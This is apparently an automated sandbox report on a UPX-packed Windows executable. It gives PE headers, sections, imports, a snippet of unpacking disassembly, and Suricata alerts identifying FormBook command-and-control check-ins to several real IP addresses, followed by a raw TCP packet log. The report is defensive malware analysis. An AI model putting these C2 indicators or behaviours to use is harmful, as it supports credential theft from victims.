                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jc 00007F6FD8E07560h
                                              add ebx, ebx
                                              jne 00007F6FD8E075A9h
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              adc ecx, ecx
                                              add ebx, ebx
                                              jnc 00007F6FD8E07591h
                                              jne 00007F6FD8E075ABh
                                              mov ebx, dword ptr [esi]
                                              sub esi, FFFFFFFCh
                                              adc ebx, ebx
                                              jnc 00007F6FD8E07586h
                                              add ecx, 02h
                                              cmp ebp, FFFFFB00h
                                              adc ecx, 02h
                                              lea edx, dword ptr [edi+ebp]
                                              cmp ebp, FFFFFFFCh
                                              jbe 00007F6FD8E075B0h
                                              mov al, byte ptr [edx]

                                              Rich Headers

                                              Programming Language:
                                              • [ASM] VS2013 build 21005
                                              • [ C ] VS2013 build 21005
                                              • [C++] VS2013 build 21005
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2013 UPD5 build 40629
                                              • [RES] VS2013 build 21005
                                              • [LNK] VS2013 UPD5 build 40629

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x23d8a80x424.rsrc
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x18b0000xb28a8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x23dccc0xc.rsrc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x18aca40x48UPX1
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              UPX00x10000x1340000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              UPX10x1350000x560000x55e002a390bc407fcab5ebe5211f8bcc0798dFalse0.9873970842430859data7.936151989520538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x18b0000xb30000xb2e003113ea4e97a194f1d71fdd71bbe7b97dFalse0.9715902886967156data7.975752898020827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x18b5ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                              RT_ICON0x18b6d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                              RT_ICON0x18b8040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                              RT_ICON0x18b9300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                              RT_ICON0x18bc1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                              RT_ICON0x18bd480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                              RT_ICON0x18cbf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                              RT_ICON0x18d4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                              RT_ICON0x18da0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                              RT_ICON0x18ffb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                              RT_ICON0x1910640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                              RT_MENU0xcd4a00x50emptyEnglishGreat Britain0
                                              RT_STRING0xcd4f00x594emptyEnglishGreat Britain0
                                              RT_STRING0xcda840x68aemptyEnglishGreat Britain0
                                              RT_STRING0xce1100x490emptyEnglishGreat Britain0
                                              RT_STRING0xce5a00x5fcemptyEnglishGreat Britain0
                                              RT_STRING0xceb9c0x65cemptyEnglishGreat Britain0
                                              RT_STRING0xcf1f80x466emptyEnglishGreat Britain0
                                              RT_STRING0xcf6600x158emptyEnglishGreat Britain0
                                              RT_RCDATA0x1914d00xabe3fdata1.0003138923647457
                                              RT_GROUP_ICON0x23d3140x76dataEnglishGreat Britain0.6610169491525424
                                              RT_GROUP_ICON0x23d3900x14dataEnglishGreat Britain1.25
                                              RT_GROUP_ICON0x23d3a80x14dataEnglishGreat Britain1.15
                                              RT_GROUP_ICON0x23d3c00x14dataEnglishGreat Britain1.25
                                              RT_VERSION0x23d3d80xdcdataEnglishGreat Britain0.6181818181818182
                                              RT_MANIFEST0x23d4b80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                              Imports

                                              DLLImport
                                              KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                              ADVAPI32.dllGetAce
                                              COMCTL32.dllImageList_Remove
                                              COMDLG32.dllGetOpenFileNameW
                                              GDI32.dllLineTo
                                              IPHLPAPI.DLLIcmpSendEcho
                                              MPR.dllWNetUseConnectionW
                                              ole32.dllCoGetObject
                                              OLEAUT32.dllVariantInit
                                              PSAPI.DLLGetProcessMemoryInfo
                                              SHELL32.dllDragFinish
                                              USER32.dllGetDC
                                              USERENV.dllLoadUserProfileW
                                              UxTheme.dllIsThemeActive
                                              VERSION.dllVerQueryValueW
                                              WININET.dllFtpOpenFileW
                                              WINMM.dlltimeGetTime
                                              WSOCK32.dllconnect

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishGreat Britain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-26T15:22:25.684016+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54970981.88.63.4680TCP
                                              2024-09-26T15:22:25.684016+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54970981.88.63.4680TCP
                                              2024-09-26T15:22:41.399078+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549710217.70.184.5080TCP
                                              2024-09-26T15:22:43.918437+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549711217.70.184.5080TCP
                                              2024-09-26T15:22:46.510005+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549712217.70.184.5080TCP
                                              2024-09-26T15:22:49.195322+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549713217.70.184.5080TCP
                                              2024-09-26T15:22:49.195322+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549713217.70.184.5080TCP
                                              2024-09-26T15:22:54.968757+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549714172.96.187.6080TCP
                                              2024-09-26T15:22:57.503736+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549716172.96.187.6080TCP
                                              2024-09-26T15:23:00.059704+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549717172.96.187.6080TCP
                                              2024-09-26T15:23:02.624619+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549718172.96.187.6080TCP
                                              2024-09-26T15:23:02.624619+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549718172.96.187.6080TCP
                                              2024-09-26T15:23:08.176919+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497193.33.130.19080TCP
                                              2024-09-26T15:23:11.813069+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497203.33.130.19080TCP
                                              2024-09-26T15:23:13.466122+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497213.33.130.19080TCP
                                              2024-09-26T15:23:16.977869+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497223.33.130.19080TCP
                                              2024-09-26T15:23:16.977869+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497223.33.130.19080TCP
                                              2024-09-26T15:23:22.709740+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54972467.223.117.18980TCP
                                              2024-09-26T15:23:25.262284+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54972567.223.117.18980TCP
                                              2024-09-26T15:23:27.824971+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54972667.223.117.18980TCP
                                              2024-09-26T15:23:31.454204+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54972767.223.117.18980TCP
                                              2024-09-26T15:23:31.454204+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54972767.223.117.18980TCP
                                              2024-09-26T15:23:38.628177+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549728103.248.137.20980TCP
                                              2024-09-26T15:23:41.173987+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549729103.248.137.20980TCP
                                              2024-09-26T15:23:43.720757+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549730103.248.137.20980TCP
                                              2024-09-26T15:24:06.264764+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549731103.248.137.20980TCP
                                              2024-09-26T15:24:06.264764+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549731103.248.137.20980TCP
                                              2024-09-26T15:24:19.848287+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497323.33.130.19080TCP
                                              2024-09-26T15:24:22.382753+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497333.33.130.19080TCP
                                              2024-09-26T15:24:24.949810+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497343.33.130.19080TCP
                                              2024-09-26T15:24:27.494268+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497353.33.130.19080TCP
                                              2024-09-26T15:24:27.494268+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497353.33.130.19080TCP
                                              2024-09-26T15:24:32.994875+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497363.33.130.19080TCP
                                              2024-09-26T15:24:35.552839+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497373.33.130.19080TCP
                                              2024-09-26T15:24:38.092661+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497383.33.130.19080TCP
                                              2024-09-26T15:24:40.651608+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497393.33.130.19080TCP
                                              2024-09-26T15:24:40.651608+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497393.33.130.19080TCP
                                              2024-09-26T15:24:46.627043+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974085.153.138.11380TCP
                                              2024-09-26T15:24:49.258935+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974185.153.138.11380TCP
                                              2024-09-26T15:24:51.979677+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974285.153.138.11380TCP
                                              2024-09-26T15:24:54.672159+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54974385.153.138.11380TCP
                                              2024-09-26T15:24:54.672159+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54974385.153.138.11380TCP
                                              2024-09-26T15:25:00.942005+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549744172.67.165.2580TCP
                                              2024-09-26T15:25:03.909947+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549745172.67.165.2580TCP
                                              2024-09-26T15:25:07.014255+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549746172.67.165.2580TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 15:22:25.025877953 CEST4970980192.168.2.581.88.63.46
                                              Sep 26, 2024 15:22:25.030900002 CEST804970981.88.63.46192.168.2.5
                                              Sep 26, 2024 15:22:25.031044006 CEST4970980192.168.2.581.88.63.46
                                              Sep 26, 2024 15:22:25.040668964 CEST4970980192.168.2.581.88.63.46
                                              Sep 26, 2024 15:22:25.045550108 CEST804970981.88.63.46192.168.2.5
                                              Sep 26, 2024 15:22:25.683492899 CEST804970981.88.63.46192.168.2.5
                                              Sep 26, 2024 15:22:25.683912039 CEST804970981.88.63.46192.168.2.5
                                              Sep 26, 2024 15:22:25.684015989 CEST4970980192.168.2.581.88.63.46
                                              Sep 26, 2024 15:22:25.687313080 CEST4970980192.168.2.581.88.63.46
                                              Sep 26, 2024 15:22:25.692986012 CEST804970981.88.63.46192.168.2.5
                                              Sep 26, 2024 15:22:40.761929035 CEST4971080192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:40.766916990 CEST8049710217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:40.767004013 CEST4971080192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:40.778537035 CEST4971080192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:40.783373117 CEST8049710217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:41.397710085 CEST8049710217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:41.398663044 CEST8049710217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:41.399077892 CEST4971080192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:42.283520937 CEST4971080192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:43.304529905 CEST4971180192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:43.309376955 CEST8049711217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:43.309511900 CEST4971180192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:43.321964979 CEST4971180192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:43.326798916 CEST8049711217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:43.918278933 CEST8049711217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:43.918340921 CEST8049711217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:43.918437004 CEST4971180192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:44.830796003 CEST4971180192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:45.849092960 CEST4971280192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:45.853943110 CEST8049712217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:45.854037046 CEST4971280192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:45.866069078 CEST4971280192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:45.870929003 CEST8049712217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:45.871089935 CEST8049712217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:46.509876013 CEST8049712217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:46.509916067 CEST8049712217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:46.510004997 CEST4971280192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:47.377974987 CEST4971280192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:48.396157980 CEST4971380192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:48.585870981 CEST8049713217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:48.586039066 CEST4971380192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:48.595016956 CEST4971380192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:48.599879026 CEST8049713217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:49.195121050 CEST8049713217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:49.195178032 CEST8049713217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:49.195211887 CEST8049713217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:49.195322037 CEST4971380192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:49.195354939 CEST4971380192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:49.206470966 CEST4971380192.168.2.5217.70.184.50
                                              Sep 26, 2024 15:22:49.211596012 CEST8049713217.70.184.50192.168.2.5
                                              Sep 26, 2024 15:22:54.494374037 CEST4971480192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:54.500123024 CEST8049714172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:54.500211954 CEST4971480192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:54.511765003 CEST4971480192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:54.516706944 CEST8049714172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:54.968684912 CEST8049714172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:54.968708992 CEST8049714172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:54.968756914 CEST4971480192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:56.017724037 CEST4971480192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:57.043193102 CEST4971680192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:57.049767017 CEST8049716172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:57.049886942 CEST4971680192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:57.069202900 CEST4971680192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:57.074096918 CEST8049716172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:57.503612995 CEST8049716172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:57.503660917 CEST8049716172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:57.503736019 CEST4971680192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:58.580164909 CEST4971680192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:59.606446028 CEST4971780192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:59.611922979 CEST8049717172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:59.612037897 CEST4971780192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:59.623418093 CEST4971780192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:22:59.628257036 CEST8049717172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:22:59.628467083 CEST8049717172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:00.059273958 CEST8049717172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:00.059626102 CEST8049717172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:00.059704065 CEST4971780192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:23:01.127096891 CEST4971780192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:23:02.146279097 CEST4971880192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:23:02.175646067 CEST8049718172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:02.175872087 CEST4971880192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:23:02.183551073 CEST4971880192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:23:02.188457012 CEST8049718172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:02.624314070 CEST8049718172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:02.624357939 CEST8049718172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:02.624619007 CEST4971880192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:23:02.645157099 CEST4971880192.168.2.5172.96.187.60
                                              Sep 26, 2024 15:23:02.650022030 CEST8049718172.96.187.60192.168.2.5
                                              Sep 26, 2024 15:23:07.717573881 CEST4971980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:07.722366095 CEST80497193.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:07.722467899 CEST4971980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:07.737963915 CEST4971980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:07.742721081 CEST80497193.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:08.176808119 CEST80497193.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:08.176918983 CEST4971980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:09.252321959 CEST4971980192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:09.257275105 CEST80497193.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:10.411186934 CEST4972080192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:10.416630983 CEST80497203.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:10.416726112 CEST4972080192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:10.471750975 CEST4972080192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:10.476737976 CEST80497203.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:11.812869072 CEST80497203.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:11.813069105 CEST4972080192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:11.986623049 CEST4972080192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:11.991638899 CEST80497203.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:13.005719900 CEST4972180192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:13.010617018 CEST80497213.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:13.010742903 CEST4972180192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:13.021862030 CEST4972180192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:13.026712894 CEST80497213.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:13.026758909 CEST80497213.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:13.466041088 CEST80497213.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:13.466121912 CEST4972180192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:14.534454107 CEST4972180192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:14.539376974 CEST80497213.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:15.552663088 CEST4972280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:15.557748079 CEST80497223.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:15.557871103 CEST4972280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:15.565221071 CEST4972280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:15.570041895 CEST80497223.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:16.977345943 CEST80497223.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:16.977456093 CEST80497223.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:16.977869034 CEST4972280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:16.980937004 CEST4972280192.168.2.53.33.130.190
                                              Sep 26, 2024 15:23:16.987016916 CEST80497223.33.130.190192.168.2.5
                                              Sep 26, 2024 15:23:22.112643957 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.117717981 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.117861032 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.129138947 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.134226084 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.709606886 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.709640026 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.709655046 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.709739923 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.709822893 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.709830046 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.710040092 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.710150003 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.710156918 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.710163116 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.710449934 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.710556984 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.710571051 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.710633039 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.714574099 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.714679003 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.714689016 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.714740038 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.796557903 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.796567917 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.796598911 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.796785116 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.796885014 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.796921015 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.797106028 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797111034 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797117949 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797122002 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797239065 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.797420025 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797611952 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797616959 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797914028 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797919989 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.797938108 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.798002958 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:22.798203945 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.798392057 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.798398972 CEST804972467.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:22.798568964 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:23.642640114 CEST4972480192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:24.661715031 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:24.666676044 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:24.666800022 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:24.677985907 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:24.683047056 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.261872053 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262027979 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262186050 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262192011 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262284040 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.262284040 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.262511969 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262516975 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262528896 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262662888 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262670994 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262681961 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262692928 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.262747049 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.267330885 CEST804972567.223.117.189192.168.2.5
